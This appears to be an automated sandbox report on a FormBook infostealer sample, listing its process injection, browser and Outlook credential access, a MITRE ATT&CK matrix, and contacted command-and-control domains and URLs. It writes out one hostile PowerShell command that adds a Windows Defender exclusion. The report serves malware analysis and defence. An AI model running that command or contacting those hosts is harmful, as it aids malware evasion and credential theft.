                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory written: C:\Users\user\Desktop\PO 20495088.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: NULL target: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\sdiagnhost.exeThread register set: target process: 6308Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\sdiagnhost.exeThread APC queued: target process: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess created: C:\Users\user\Desktop\PO 20495088.exe "C:\Users\user\Desktop\PO 20495088.exe"Jump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: sKyuoUfZdk.exe, 00000008.00000000.2506681823.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3899191014.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000000.2657737477.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: sKyuoUfZdk.exe, 00000008.00000000.2506681823.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3899191014.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000000.2657737477.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: sKyuoUfZdk.exe, 00000008.00000000.2506681823.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3899191014.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000000.2657737477.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: sKyuoUfZdk.exe, 00000008.00000000.2506681823.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3899191014.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000000.2657737477.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PO 20495088.exeQueries volume information: C:\Users\user\Desktop\PO 20495088.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.PO 20495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PO 20495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\sdiagnhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.PO 20495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PO 20495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557623 Sample: PO 20495088.exe Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 35 www.urssaf.pro 2->35 37 www.tenmyk.shop 2->37 39 8 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 53 6 other signatures 2->53 10 PO 20495088.exe 4 2->10         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\PO 20495088.exe.log, ASCII 10->33 dropped 65 Adds a directory exclusion to Windows Defender 10->65 67 Injects a PE file into a foreign processes 10->67 14 PO 20495088.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 19 sKyuoUfZdk.exe 14->19 injected 73 Loading BitLocker PowerShell Module 17->73 22 conhost.exe 17->22         started        process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 19->55 24 sdiagnhost.exe 13 19->24         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 24->57 59 Tries to harvest and steal browser information (history, passwords, etc) 24->59 61 Modifies the context of a thread in another process (thread injection) 24->61 63 3 other signatures 24->63 27 sKyuoUfZdk.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.inspires.website 203.161.49.193, 49999, 50000, 50001 VNPT-AS-VNVNPTCorpVN Malaysia 27->41 43 www.isirumah.info 15.197.204.56, 50007, 50008, 50009 TANDEMUS United States 27->43 45 7 other IPs or domains 27->45 69 Found direct / indirect Syscall (likely to bypass EDR) 27->69 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PO 20495088.exe39%ReversingLabsByteCode-MSIL.Trojan.Genie8DN
                PO 20495088.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.fedegaritech.online/USC_University_Affiliated_Program.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZ0%Avira URL Cloudsafe
                http://www.fedegaritech.online/__media__/design/underconstructionnotice.php?d=fedegaritech.online0%Avira URL Cloudsafe
                http://www.fedegaritech.online/Feeds.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN50%Avira URL Cloudsafe
                http://www.inspires.website/tv3i/?3Vh=owqNhS77mKpyFubSJ5A9QVznt18Efvf/o4h2nqBSdp8yXNsKj6uoPtg3kRvBj/pxRtAtOgnrofTovjHhINZ0xj2/y7I6W0FrsduvE6GCulNhl0GmpxyNmPQFElMITGXJFg==&GLvL=i6ILStp0%Avira URL Cloudsafe
                http://www.tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A==0%Avira URL Cloudsafe
                http://www.inspires.website/tv3i/0%Avira URL Cloudsafe
                http://www.fedegaritech.online/Green_Foods_Benefits.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB80%Avira URL Cloudsafe
                http://www.livelovechat.live/pd34/?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg==0%Avira URL Cloudsafe
                http://www.fedegaritech.online/__media__/js/trademark.php?d=fedegaritech.online&type=ns0%Avira URL Cloudsafe
                http://www.urssaf.pro/z0cc/?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp0%Avira URL Cloudsafe
                http://www.isirumah.info/guxl/0%Avira URL Cloudsafe
                http://www.fedegaritech.online/sxrn/0%Avira URL Cloudsafe
                http://www.fedegaritech.online/Cerebral_Palsy_Types.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB80%Avira URL Cloudsafe
                http://www.Fedegaritech.online0%Avira URL Cloudsafe
                http://www.ssrnoremt-rise.sbs/3jsc/0%Avira URL Cloudsafe
                http://www.ssrnoremt-rise.sbs0%Avira URL Cloudsafe
                http://www.fedegaritech.online/Fodder.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN0%Avira URL Cloudsafe
                http://www.urssaf.pro/z0cc/0%Avira URL Cloudsafe
                https://tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB80%Avira URL Cloudsafe
                http://www.livelovechat.live/pd34/0%Avira URL Cloudsafe
                http://www.newegg.club/z6yq/0%Avira URL Cloudsafe
                http://www.tenmyk.shop/qpp1/0%Avira URL Cloudsafe
                http://www.fedegaritech.online/sxrn/?3Vh=70g3synrMt+mv3bMA5M2pxuaxfXYXBcuz2rDMeB4YhlIhpmz1+c2ZYK3A+er04ehZbUUhJrT7mt7qDpgqvLlNMW5io5Y2wz+3pIWYjAXlaRVZqa6aRI+hdIryUt+yvXWOw==&GLvL=i6ILStp0%Avira URL Cloudsafe
                http://www.newegg.club/z6yq/?GLvL=i6ILStp&3Vh=IJnefPGbAG2krK+EKqL7a6PcsOn2aPK/WZ9HL1Dz7m/jpK3dV9N7lfXoIgTZBqqJT6Dwk+2xUIDeSWpocJA6c4hKTPFrc23hpH01F3StVZ8qYYY4ti7AYH4NQlXIhw0jjg==0%Avira URL Cloudsafe
                http://www.isirumah.info/guxl/?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.habitat.rent
                		13.248.169.48
                		truetrue
                  		unknown
                  www.newegg.club
                  		149.115.238.44
                  		truetrue
                    		unknown
                    www.fedegaritech.online
                    		208.91.197.27
                    		truetrue
                      		unknown
                      www.tenmyk.shop
                      		104.21.74.79
                      		truetrue
                        		unknown
                        livelovechat.live
                        		3.33.130.190
                        		truetrue
                          		unknown
                          www.ssrnoremt-rise.sbs
                          		188.114.97.3
                          		truetrue
                            		unknown
                            www.urssaf.pro
                            		75.2.103.23
                            		truetrue
                              		unknown
                              www.inspires.website
                              		203.161.49.193
                              		truetrue
                                		unknown
                                www.isirumah.info
                                		15.197.204.56
                                		truetrue
                                  		unknown
                                  www.livelovechat.live
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.inspires.website/tv3i/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.livelovechat.live/pd34/?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.inspires.website/tv3i/?3Vh=owqNhS77mKpyFubSJ5A9QVznt18Efvf/o4h2nqBSdp8yXNsKj6uoPtg3kRvBj/pxRtAtOgnrofTovjHhINZ0xj2/y7I6W0FrsduvE6GCulNhl0GmpxyNmPQFElMITGXJFg==&GLvL=i6ILStptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.urssaf.pro/z0cc/?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.isirumah.info/guxl/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.ssrnoremt-rise.sbs/3jsc/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.urssaf.pro/z0cc/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.livelovechat.live/pd34/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fedegaritech.online/sxrn/true
                                    • Avira URL Cloud: safe
